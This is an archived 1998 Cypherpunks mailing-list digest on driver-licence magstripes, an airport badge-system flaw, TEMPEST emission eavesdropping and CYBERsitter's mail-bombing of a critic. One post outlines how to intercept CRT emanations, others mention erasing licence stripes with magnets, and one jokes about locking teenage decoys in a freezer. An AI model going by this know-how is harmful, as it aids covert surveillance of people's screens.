   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Mon, 9 Feb 1998 15:56:46 +0800
To: cypherpunks@ssz.com
Subject: re: Drivers Licenses
Message-ID: <199802090735.IAA08517@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:

>> From: "William H. Geiger III" <whgiii@invweb.net>
>> 
>> A couple of times through the washer and dryer and that 
>> lamination seperates. Any cop that has worked traffic 
>> has seen plenty of DL's in this shape (heh should have 
>> seen my old DL when I truned it in to get it renewed <g>).
> 
> I rather doubt that. I have had a Texas drivers license 
> since I was 16, I'm now 38. I have washed them innumerable 
> times and I have never had the lamination break or 
> otherwise degrade. The lamination is quite heavy. I did
> have one crack at the seam one time because of a bad 
> lamination and was specificaly instructed by the officer 
> who wrote me a speeding ticket to get it replaced. I did 
> so immediately. 

"Yes SIR!"

> The law here is that if the license is damaged, you move, 
> or otherwise make the information invalid you have 30
> days to correct it. 

"Yes SIR!"

> I suspect quite strongly that had I shown up at the
> court house to pay that ticket with the same damaged 
> license (required to be shown at the time of payment) 
> they would not have accepted the payment and might have 
> asked to to discuss the situation with one of the 
> officers they so thoughtfuly have placed about the room.

"Yes SIR!"

> Texas takes counterfeiting of licenses quite seriously.

"Yes SIR!"

> My suggestion would be don't try such juvenile tricks here, 

"No, SIR!"

> the DPS have seen it before 

"Yes SIR!"

> and won't be pleasant people to deal with unless you're 
> a juvenile.

"No SIR!"

This is one of the things I love so about Texas and Texans.
Despite inexplicable rumors and propaganda about independence
and rugged frontier indivuality, Texans are as fucking
obedient to authority as the most lock-stepped fucking
Germans. The People's Republic of Texas is on the leading 
edge of Big Brother statism. Sales tax fully as high as
New York's, fingerprints at driver license renewal time,
roadblocks to fish for people who have been indulging in
adult beverages or who have outstanding warrants, and some
of the most dumb-fuck, clueless, fuckwit people behind
badges in the known universe. Texans will give anyone
their SS number at any time for any reason. Many print it
on their checks. Texas is without doubt the Rube State.
The only reason it isn't on the bleeding foreskin of
Big Brother technology is that there aren't enough clues
in the state to rub together to make a spark. When you
run into anyone halfway sharp or better in Texas, it's
a cinch they are a refugee from the unforgiving North.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 9 Feb 1998 22:54:28 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Airport security cracked by flaw [CNN]
Message-ID: <199802091452.IAA20852@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.cnn.com/TECH/computing/9802/08/security.reut/index.html

>            REPORT: COMPUTER DESIGN FLAW OPENS AIRPORTS TO TERRORISM
>                                        
>      graphic February 8, 1998
>      Web posted at: 1:25 p.m. EST (1825 GMT)
>      
>      NEW YORK (Reuters) -- The computer security systems that control
>      access to 40 airports worldwide through electronic badges have a
>      design flaw that could make them vulnerable to terrorism, The New
>      York Times reported Sunday.
>      
>      A California computer security consulting firm, MSB Associates,
>      found the flaw in December in a routine audit of a large California
>      financial services software company, the identity of which was not
>      disclosed, according to the newspaper.
>      
>      Government buildings, including that of the CIA, and prisons and
>      industries with sensitive military, drug or financial information or
>      material also use the system and are also vulnerable to attack, the
>      Times report said.

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Mon, 9 Feb 1998 15:57:29 +0800
To: "William H. Geiger III" <whgiii@invweb.net>
Subject: Re: Driver Licenses
In-Reply-To: <199802082027.PAA00347@users.invweb.net>
Message-ID: <Pine.BSF.3.96.980209084404.15559A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 8 Feb 1998, William H. Geiger III wrote:
> My question is what is the best way to remove this information from the
> cards?

Making the mag stripe on a driver license unreadable by a POS terminal is
easy. A refrigerator magnet will suffice. There is only one problem:
chances are you then won't be sold any alcohol.

See, major chains, such as the Southland corporation [7/11], recently
installed POS terminals that are linked to the cash register. [This may
not have reached a particular reader's area yet, please don't reply with
"but my 7/11 down the corner does not do this"].

Unless a driver license has been swiped, the cash register will not permit
the clerk to ring up the sale. It doesn't matter how old you are, you can
be 80 years old and in a wheelchair, no government issued ID with working
mag stripe, no alcohol or tobacco products for you.

The clerk at my local 7/11 assured me the information captured would not
be forwarded to a central site. Yet. It appears the stores are installing
these systems to protect themselves against police sting "test buys", in
which the authorities take persons just days shy of their 21st birthday,
put theater makeup and/or a gray beard and wig on them and thus entrap
store clerks into selling controlled substances to minors.

As any fool can predict, the information captured will not remain local
for long. After all, the system is ideal for monitoring gun^H^H^H alcohol
purchases of parolees, tracking down deadbeat dads, etc.


-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 10 Feb 1998 01:21:18 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Driver Licenses
In-Reply-To: <ac25297f5d97f55fb62fca290eeac01f@anon.efga.org>
Message-ID: <3.0.5.32.19980209091437.007b5da0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>I used to work in a lab with an MRI.  Erased my credit cards
>regularly.  I visit from time to time. :)

Don't you just hate it when that happens :-)
In particular, unlike scratching the mag strip off or ironing,
if the mag strip doesn't work, you can just look ignorant.
I have enough trouble with my real credit cards being non-scannable.

The issue of driver's license mag strip technology has been
discussed here in the past, and probably also on some of the
privacy newsgroups.  You could grunge around the archives and
see what you find.  If memory serves me correctly, most of them
use a common magstripe format used for credit cards,
which gives three stripes of up to about 80 bytes each.
(It's been suggested that some states use a higher magnetization
level, either to reduce forgery or probability of damage.)
Typically they'll have the DL#, name, height, weight,
eye color, race, Jew bit, Commie bit, etc.,
so the cops can not only scan the information conveniently,
but also can compare it to the information on the front
to see if it's forged.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 10 Feb 1998 01:33:38 +0800
To: Lucky Green <whgiii@invweb.net>
Subject: Re: Driver Licenses
In-Reply-To: <199802082027.PAA00347@users.invweb.net>
Message-ID: <v03102801b104e8dbf314@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:00 AM -0800 2/9/98, Lucky Green wrote:

>See, major chains, such as the Southland corporation [7/11], recently
>installed POS terminals that are linked to the cash register. [This may
>not have reached a particular reader's area yet, please don't reply with
>"but my 7/11 down the corner does not do this"].
>
>Unless a driver license has been swiped, the cash register will not permit
>the clerk to ring up the sale. It doesn't matter how old you are, you can
>be 80 years old and in a wheelchair, no government issued ID with working
>mag stripe, no alcohol or tobacco products for you.

If this is consistently the case, then one approach is to wheel a cart up
to the checkout line with some alcohol....and a cart full of items from the
freezer and deli sections. (Some cartons of chicken salad, partly
"sampled," for example.)

If a U.S. Passport is not considered enough I.D., because it doesn't have
the Big Brother Inside magstripe, one walks away from the transaction.

"Oh, OK, you won't take my money. Bye!"

(I don't believe there are any laws saying a customer must separate his
purchases...if the store refuses to transact business with a customer, he
may leave.)

This leaves all that frozen food to be quickly returned to the shelves, and
the deli food, which probably cannot be returned. (Depends on store and
health department policy.)

I wish no ill will toward merchants, but implementing a Big Brother Inside
tracking policy carries some real costs.

Lucky didn't want us to reply with anecdotes, but I have to note that many,
many people will inevitably not have the type of cards Lucky refers to.
Visitors, tourists, residents of other states, etc. This would all be lost
revenue to stores. I thus question the "universality" of Southland's plans.
Perhaps only those who "look under 26" (which is what the signs say) will
be "striped carded."

>The clerk at my local 7/11 assured me the information captured would not
>be forwarded to a central site. Yet. It appears the stores are installing
>these systems to protect themselves against police sting "test buys", in
>which the authorities take persons just days shy of their 21st birthday,
>put theater makeup and/or a gray beard and wig on them and thus entrap
>store clerks into selling controlled substances to minors.

Lucky is right that that "underage stings" are on the increase. Underage
persons, often in high school, beome self-righteour warriors in the War On
Demon Rum, and "narc out" their local shopkeepers.

Hey, it would serve these junior narcs right if, upon being carded and
being shown to be underage, a store owner made a citizen's arrest. Perhaps
putting the perp in the back freezer for a few hours would send a message.


>As any fool can predict, the information captured will not remain local
>for long. After all, the system is ideal for monitoring gun^H^H^H alcohol
>purchases of parolees, tracking down deadbeat dads, etc.

We are on the road toward a surveillance society.

Sadly, the ideas of David Chaum are more needed than ever, but his stuff is
essentially nowhere to be seen. (To reflect Lucky's comments back to him,
:-), spare us any citations of how Mark Twain Bank will let some people
open a cumbersome Digicash account.)

--Tim May


Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Mon, 9 Feb 1998 16:24:11 +0800
To: Jim Choate <ravage@ssz.com>
Subject: re: Drivers Licenses (fwd)
In-Reply-To: <199802090355.VAA18303@einstein.ssz.com>
Message-ID: <Pine.BSF.3.96.980209092335.15559B-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 8 Feb 1998, Jim Choate wrote:
> I have a proposal. Lucky is supposed to be in Austin for the CFP conference.
> If he is agreeable, he could ask to examine a Tx. d.l. We could leave it up
> to his opinion as to whether these would be easy to alter.

Why me?

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 9 Feb 1998 22:40:36 +0800
To: cypherpunks@toad.com
Subject: EPIC World Crypto Survey
Message-ID: <1.5.4.32.19980209142939.00b36c60@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



The New York Times, February 9, 1998, p. D10:

U.S. Losing Battle on Control of Data Encryption, Study Says

By Jeri Clausing

Washington -- The Clinton Administration is losing its battle
to increase international controls over how reliably computer
data can be scrambled to insure privacy, according to a report
to be released Monday by an independent research group. ...

The Electronic Privacy Information Center <http://www.epic.org>
says that its survey of 243 governments showed that the United
States is virtually the only democratic, industrialized nation
seeling domestic regulation of strong encryption.

That finding directly contradicts the Clinton Administration's
assertions in Congressional hearings that it has the support of
most nations on this issue. ...

William Reinsch, the Under Secretary for export administration
in the United States Commerce Department, denied that the study
contradicted the Administration's assertions. "All the 
Administration has ever said is that there are more countries 
that go farther  than we do," Mr. Reinsch said. "The study 
confirms that."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Tue, 10 Feb 1998 01:58:52 +0800
To: Tim May <jya@pipeline.com>
Subject: Re: Soft Tempest
In-Reply-To: <tw7k9b5uzhy.fsf@the-great-machine.mit.edu>
Message-ID: <3.0.5.32.19980209093105.007b3780@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



At 10:14 PM 2/8/98 -0800, Tim May wrote:
>At 9:19 PM -0800 2/8/98, Ryan Lackey wrote:
>
>
>The physics suggests just the opposite: the RF emissions from laptops are
>expected to be lower from first principles, and, I have heard, are
>measurably much lower. (I say "have heard" because I don't have any access
>to RF measurement equipment...I once spent many hours a day working inside
>a Faraday cage, but that was many years ago.)
...later...
>But before going this route, I'd want to see some measurements. Laptops
>might already be "quiet enough." (Measurements are needed to determine the
>effectiveness of any proposed RF shielding anyway, so....)

The interference that laptops can cause with avionics is 
prima facie evidence that laptops are not quiet.


>The first principles part is that the deflection yokes in a CRT are the
>largest radiated component of what got named "van Eck radiation." (I'd just
>call it RF, but whatever.)
>
>Laptops are missing this component. (It might be interesting to see the
>radiated RF numbers for various kinds of flat panel displays.)

They are not missing the periodic pixel clocking signals though.


...
>With some of these glasses, gargoyle-style, one could completely encase the
>laptop in a shielded case (like a Zero Haliburton) and then use a palm
>keypad...

Yes, but cables radiate.  Wires are antennae.  Used to be a big problem
when laptops had wired mice.

BTW, in van Eck's original paper, he gives a way to make screen spying
a little tougher: pick random raster-lines to draw instead of the usual
order.  This of course would not be a significant barrier to modern
interception.

------

Enrico Fermi used to tune a regular music radio to a cyclotron(?) so he
could tell
that it was working, I've read.






------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

		Lewinsky for President '2012




	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Mon, 9 Feb 1998 22:59:21 +0800
To: cypherpunks@toad.com
Subject: CYBERsitter caught mail-bombing (fwd)
Message-ID: <Pine.SOL.3.96.980209094227.21181A-100000@c00953-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Fri, 6 Feb 1998 23:25:04 -0500
From: bennett@peacefire.org
To: peacefire-broadcast@vorlon.mit.edu
Subject: CYBERsitter caught mail-bombing

CYBERsitter has been caught in the act of mail-bombing someone who wrote a
letter to Brian Milburn, the CEO of CYBERsitter, complaining about their
product.  Spefically, a lady names Sarah Salls sent the following letter to
Brian Milburn at bmilburn@solidoak.com:

        http://peacefire.org/archives/SOS.letters/asherah.2.bm.2.4.98.txt

She was writing to CYBERsitter regarding their harassment of Peacefire and
their blocking of anti-censorship sites, which is described in more detail at:
        http://www.peacefire.org/censorware/CYBERsitter/

CYBERsitter replied by flooding her account with over 446 junk messages.
While the attack was in progress, Ms. Salls had her ISP's postmaster monitor
the incoming attack and shut it off.  Naturally, her ISP, Valinet.com, kept
copies of the mail logs for that day and has passed them on as evidence to
their lawyers.  A complaint was also forwarded to MCI's security department,
which handles network abuse and illegal denial-of-service attacks that are
perpetrated by their customers, which include lower-end network users like
CYBERsitter:

        http://peacefire.org/archives/SOS.letters/valinet.2.mci.2.5.98.txt

C-Net's NEWS.com picked up on the story and interviewed Sarah Salls, her
ISP, me, and Brian Milburn from Solid Oak Software.  Their story is at:

        http://www.news.com/News/Item/0,4,18937,00.html

(Note that the C-Net article compares the act of mail flooding with
conventional spam, and says that a bill is being considered in Congress that
would outlaw what CYBERsitter did.  This is not quite true; flooding a
person's account with 500 junk messages is a denial-of-service attack, which
is already illegal, and it usually gets you in a lot more trouble than
spamming would.)

Far from denying the accusations, Brian Milburn gave C-Net the following
quote: "Certain people aren't going to get the hint.  Maybe if they get the
email 500 times, they'll get it through their heads...  If they send it to
my private email account, they're going to get what they get."  No kidding,
Brian!



bennett@peacefire.org     (615) 421 6284     http://www.peacefire.org/

---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 10 Feb 1998 02:05:42 +0800
To: cypherpunks@cyberpass.net
Subject: Interview with the man who creamed Bill Gates
Message-ID: <Pine.GSO.3.95.980209095931.28455G-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Mon, 9 Feb 1998 09:29:44 -0800 (PST)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: Interview with the man who creamed Bill Gates

Is at:

  http://cgi.pathfinder.com/netly/opinion/0,1042,1733,00.html

-Declan







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Tue, 10 Feb 1998 02:35:54 +0800
To: Markus Kuhn <cypherpunks@toad.com
Subject: Re: Soft Tempest
In-Reply-To: <v03102800b1044ad31629@[207.167.93.63]>
Message-ID: <3.0.5.32.19980209101733.007a6e30@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



At 04:54 PM 2/9/98 +0000, Markus Kuhn wrote:
> The horizontal and vertical
>deflection coils produce a lot of radiation at harmonics of the
>line and frame rate of your CRT, but this signal energy is not
>related to your screen content (only to your video mode), and therefore
>not of much concern for the eavesdropper. The low-radion monitor
>standards look only at those signal (<400 kHz). Therefore having
>a TCO92 monitor provides you absolutely no advantage with respect
>to eavesdropping.

>The information carrying signals of VDUs are in much higher frequency
>ranges in the VHF/UHF bands. Laptops are pretty good broadcasters
>there, too.

One of the issues is that the fast rise-times on signals yields
emissions all over the spectrum, not just at the base scanning rate.
Thus, even though you're sending at e.g., 2400 bps, you've got an N-volt
voltage/current swing accomplished in fractions of a microsecond.

These higher harmonics radiate better than the lower ones.

See Peter Smulders's paper on RS-232 interception, abstract included below.
I have a local copy at http://rattler.otc.net/crypto/docs/rs232.pdf 





The Threat of
Information Theft
by Reception of
Electromagnetic
Radiation from
RS-232 Cables
Peter Smulders
Eindhoven University of Technology, Department of Electrical Engineering,
Eindhoven, The Netherlands

Research into the possibility of picking up the
electromagnetic radiation originating from video
display units (VDUs) made clear that this type of
information theft can be committed very easily
[1]. It is not only this type of equipment which
is vulnerable to interception at a distance;
experiments on eavesdropping RS-232 cable
signals prove that it is possible in some cases to
intercept data signals running along an RS-232
cable, by picking up and decoding the
electromagnetic radiation produced by the
cable. This report gives the results of these
Electromagnetic radiation arising from RS-232 cables may
contain information which is related to the original
RS-232 data signals. The seriousness of eavesdropping
risks is shown by estimates of bit error rates feasible with
a standard radio receiver as a function of the separation
distance. In addition to this, results of experimental
eavesdropping are presented.

Keywords: RS-232 cable, Electromagnetic radiation, Eaves-dropping
risks.

Caution: Failure to detect intelligible emanations by the
methods described in this paper do not mean an
installation is secure against interception by
sophisticated and resourceful opponents.


------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

		Lewinsky for President '2012




	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@dis.org>
Date: Tue, 10 Feb 1998 02:58:41 +0800
To: DC-Stuff <dc-stuff@dis.org>
Subject: Computer design flaw opens airports to terrorism
Message-ID: <Pine.BSI.3.95.980209105236.24419B-100000@kizmiaz.dis.org>
MIME-Version: 1.0
Content-Type: text/plain



NEW YORK (Reuters) [2.9.98] - The computer security systems 
that control access to 40 airports worldwide through electronic
badges have a design flaw that could make them vulnerable 
to terrorism, the New York Times reported Sunday.

California computer security consulting firm, MSB Associates, 
found the flaw in December in a routine audit of a large 
California financial services software company, the identity 
of which was not disclosed, according to the newspaper.

Government buildings, including that of the CIA, and prisons
and industries with sensitive military, drug or financial
information or material also use the system and are also
vulnerable to attack, the Times report said.

American and British aviation officials have notified airports 
of the flaw, the Times said.  The system, introduced several 
years ago by a small company, Receptors, Inc., of Torrance, CA., 
relies on a secure, isolated computer in a guarded room to 
control door-locks and an inventory of electronic badges, 
the Times reported.

The company found, however, that in some cases an individual 
could dial in to the computer and create security badges and 
unlock doors.  Receptors' equipment was removed from the House 
of Representatives after the Inspector General found that 757 
former employees appeared on the rolls of active employees and 
had working badges that would have allowed them access to 
the House buildings, the Times said.

Receptors' chief operating officer Dale Williams said that the 
problem is not with the system but with the way it was installed 
in some cases.  Some systems were connected to networks instead 
of being accessible only by a modem that would only be turned 
on when a Receptor employee performed maintenance, Williams 
told the Times.

Testing the system, MSB found that the problem persisted as 
late as last week in the company they audited, the Times said.  
MSB created a fictitious employee, Millard Fillmore, which the 
company spotted on its rolls and removed. However, even after 
he was removed, the faux former president was still able to gain 
access to the company buildings, meaning any dismissed employee
would have the same access, the Times said.


== 
The information standard is more draconian than the gold
standard, because the government has lost control of the
marketplace.  --  Walter Wriston 
==
http://www.dis.org/erehwon/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 10 Feb 1998 01:36:40 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Laptop TEMPEST (fwd)
Message-ID: <199802091735.LAA21910@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: Laptop TEMPEST 
> Date: Mon, 09 Feb 1998 17:07:23 +0000
> From: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>

> Jim Choate wrote on 1998-02-09 06:57 UTC:
> > Doesn't the FCC have to test the RF emissions of all laptops as well as
> > monitors for sale as Class A and Class B in the US? Shouldn't that material
> > be available? I searched the main site, www.fcc.gov, but didn't find
> > anything regarding this.
> 
> I suspect that FCC material is not helpful with regard to Tempest.

As to calculating a realistic estimate of range to intercept, I disagree
strongly.

> Results of such EMI tests only measure the general power spectrum
> emitted by a device. Of interest for Tempest purposes however is
> not the power spectrum, but the spectrum of the cross-correlation

I am aware of how to do Tempest in practice as well as in theory.

The process goes something like this. The first target is the vertical
retrace. This signal is usualy the strongest because the voltage required
(and hence the dv/dt) is the largest to sling that e-beam from the lower
right to the upper left. It usualy resides in the 50-70Hz range. The next
target is the horizontal retrace. It slews the beam from the right edge of
the display to the left in order to start another trace. You can use this
signal to syn both the vertical retrace steps (in order to move the beam
down verticaly to start another trace) as well as the ramp that is required
to slew the beam across the screen to write the pixes. Once these 4 signals
are aquired and fed to the appropriate control terminals of a CRT you are
ready to begin decoding the actual trace data for each line of the display.
This is the hardest since the actual modulation of the e-beam is done via a
screen grid (who said tube theory was out of date?) and that signal is quite
small and generaly has a cardoid emission pattern aligned axialy along the
central axis of the CRT tube. So if given a choise you want your antenna to
be behind the viewer in line with the display.

It is of some import to note that larger displays are easier to aquire
usable signals from since the distances the e-beam is slewed and as a result
the control voltages are much larger.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 10 Feb 1998 03:49:52 +0800
To: Adam Back <cypherpunks@cyberpass.net
Subject: Re: time to learn chinese?
In-Reply-To: <199802091845.SAA00883@server.eternity.org>
Message-ID: <v03102802b1050abbe851@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:45 AM -0800 2/9/98, Adam Back wrote:
>Listened to an analyst on the radio expressing view that towards 2010
>China will be leading world economic power.

Like the predictions in 1970 of Russian as the language to learn? Or the
predictions in the 1980s that Japanese was the language to learn?

China is indeed a large country, so any reasonable per capita output makes
it, ranked as a "nation," very large indeed. So?

I'm not much of a believer in nation-states as influencers of world trade.
While it is true that, for example, India is a larger economic power than
Denmark is, so?

Oh, and on the specific prediction...I have my doubts about even the per
capita numbers rising as fast as some think. It's still a Communist system,
with periodic crackdowns on anyone or any entity who is perceived to be
doing "too well."

Sort of like all the moaning and gnashing that Microsoft did research and
invested money and kept working along and didn't "let" Netscape become the
"next desktop OS." Recall that Netscape was claiming the browser would
become the OS, with applets running under the browser.

Anyway, China does not as yet have even a single reasonably state of the
art chip making plant in its entire country. Given the timescales and
learning curves involved, it seems unlikely they'll be a high tech leader
in little over 10 years.

Maybe in terms of gross output of chop sticks, rice, fertilizer, etc.


--Tim May


Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 10 Feb 1998 02:10:25 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Godin Interview - Bill G's pie in the eye [CNN]
Message-ID: <199802091806.MAA22270@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://cgi.pathfinder.com/netly/textonly/1,1035,1733,00.html

>     Today's News Let's pie! Let's pie! Nincompoop guys!
>    by Hugues Henry   February 9, 1998
>    
>         Until last week, Noel Godin was relatively unknown in the United
>    States. A 52-year-old Belgian author, film historian, actor ("The
>    Sexual Life of the Belgians"), writer ("Cream and Punishment") and
>    "entarteur" (a Godin coinage that roughly translates as "encaker" or
>    "pie-er"), Godin led the gang that gave to Bill Gates what so many of
>    us only dream of: a big wet pie in the face. The attack took place at
>    the entrance of Le Concert Noble on Arlon Street in Brussels and was
>    widely reported in the press.
>    
>         Godin doesn't own a computer and didn't even know what a URL is.
>    His girlfriend, however, uses a PC. (This interview was conducted and
>    translated by Hugues Henry.)
>    
>    The Netly News: Who are you, Noel Godin?
>    
>    Noel Godin: I'm part of a gang of bad hellions that have declared the
>    pie war on all the unpleasant celebrities in every kind of domain
>    (slogan: "Let's pie! Let's pie! Nincompoop guys!"). We began to act
>    against "empty" celebrities from the artistic world who were thinking
>    they were the cat's whiskers. Then we attacked the TV news business in
>    France, for instance, Patrick Poivre D'Arvor [a famous French TV
>    presenter]. Then it became political with Philippe Douste-Blazy in
>    Cannes, the French minister of culture, or the other French minister
>    Nicolas Sarkozy last year in Brussels.
>    
>    NN When did you first pie someone?
>    
>    Godin: In November 1969, with French writer Marguerite Duras, who
>    represented for us the "empty" novel.
>    
>    NN Why did you choose Bill Gates?
>    
>    Godin: Because in a way he is the master of the world, and then
>    because he's offering his intelligence, his sharpened imagination and
>    his power to the governments and to the world as it is today -- that
>    is to say gloomy, unjust and nauseating. He could have been a utopist,
>    but he prefers being the lackey of the establishment. His power is
>    effective and bigger than that of the leaders of the governments, who
>    are only many-colored servants. So Bill Gates was at the top of our
>    lists of victims. The attack against him is symbolic, it's against
>    hierarchical power itself. Our war cry was explicit: "Let's pie! Let's
>    pie the polluting lolly!"

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 10 Feb 1998 08:48:13 +0800
To: Lucky Green <whgiii@invweb.net>
Subject: Re: Driver Licenses
In-Reply-To: <199802082027.PAA00347@users.invweb.net>
Message-ID: <3.0.5.32.19980209122020.00889e90@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:00 AM 2/9/98 +0100, Lucky Green wrote:
>The clerk at my local 7/11 assured me the information captured would not
>be forwarded to a central site. Yet. It appears the stores are installing
>these systems to protect themselves against police sting "test buys", in
>which the authorities take persons just days shy of their 21st birthday,
>put theater makeup and/or a gray beard and wig on them and thus entrap
>store clerks into selling controlled substances to minors.

The original stings were done by young-looking cops, but a few
judges (maybe just New York, maybe Federal?  it's been a while)
threw them out - if the cop is 24, then it wasn't selling to a minor,
so it wasn't a crime or necessarily even a liquor license violation.
So the cops need to hire kids (and for tobacco stings, minors.)
This gets into the interesting legal question of whether you can
insist that the decoys be prosecuted.

>As any fool can predict, the information captured will not remain local
>for long. After all, the system is ideal for monitoring gun^H^H^H alcohol
>purchases of parolees, tracking down deadbeat dads, etc.

Yup.  It's really annoying to have to give the California DMV lots of
personal information about myself so they can track down deadbeat dads,
given that I'm not even a dad, much less a deadbeat dad, and so they
can track down Mexicans who want to drive without citizenship papers,
and similar presumptions of potential guilt.


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Animal Protection League <VirginTimmieSkirvinFellatesSheep@teenworld.poboxes.com>
Date: Tue, 10 Feb 1998 02:04:18 +0800
To: freedom-knights@jetcafe.org
Subject: Re: rec.guns et.al. blocked by censorware
Message-ID: <2.2.32.19980209205329.006d7ae8@neptunenet.com>
MIME-Version: 1.0
Content-Type: text/plain



